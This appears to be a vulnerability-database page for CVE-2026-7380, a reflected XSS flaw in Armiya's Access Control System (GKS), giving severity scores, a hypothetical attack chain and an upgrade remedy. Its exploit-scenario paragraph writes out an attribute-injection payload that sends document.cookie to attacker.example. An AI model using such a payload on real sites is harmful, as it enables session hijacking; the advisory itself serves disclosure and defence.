Skip to main content

Access Control System GKS CVE-2026-7380

| EUVDEUVD-2026-42016 MEDIUM
Basic XSS (CWE-80)
2026-07-07 TR-CERT GHSA-mfw3-p4vm-vmhx
6.1
CVSS 3.1 · Vendor: TR-CERT
Share

Severity by source

Vendor (TR-CERT) PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
6.1 MEDIUM

Network-delivered reflected XSS with no auth required, user click needed, browser context changed; no server availability or confidentiality impact beyond session data.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (TR-CERT).

CVSS VectorVendor: TR-CERT

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

1
Analysis Generated
Jul 07, 2026 - 08:05 vuln.today

DescriptionCVE.org

Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in Armiya Information Technologies Ltd. Co. Access Control System (GKS) allows XSS Targeting HTML Attributes.

This issue affects Access Control System (GKS): before Version 2.

AnalysisAI

Reflected XSS in Armiya Information Technologies' Access Control System (GKS) allows unauthenticated remote attackers to inject script-bearing HTML attributes into web pages served by the application, executing arbitrary JavaScript in the context of a victim's browser. All versions prior to Version 2 are affected, as reported by TR-CERT via Turkey's national cybersecurity authority. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify GKS web interface endpoint
Delivery
Craft attribute-injection XSS payload in reflected parameter
Exploit
Deliver malicious URL to authenticated operator via phishing
Execution
Victim clicks link, browser executes injected script
Impact
Exfiltrate session token or execute privileged GKS actions

Vulnerability AssessmentAI

Exploitation Exploitation requires that a victim user - most meaningfully an authenticated GKS operator or administrator - click or otherwise trigger a crafted URL while their browser has an active session to the GKS web interface. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 6.1 (Medium) is consistent with a reflected XSS requiring user interaction (UI:R), which meaningfully limits opportunistic mass exploitation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies an organization running GKS before Version 2 and discovers a parameter whose value is reflected unsanitized into an HTML attribute in the response. The attacker crafts a URL containing an attribute-breaking payload such as `" onmouseover="fetch('https://attacker.example/steal?c='+document.cookie)` and delivers it to a GKS administrator via phishing email or malicious link. …
Remediation The primary fix is to upgrade to Access Control System (GKS) Version 2 or later, which resolves the improper HTML attribute neutralization identified in this advisory. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-7380 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy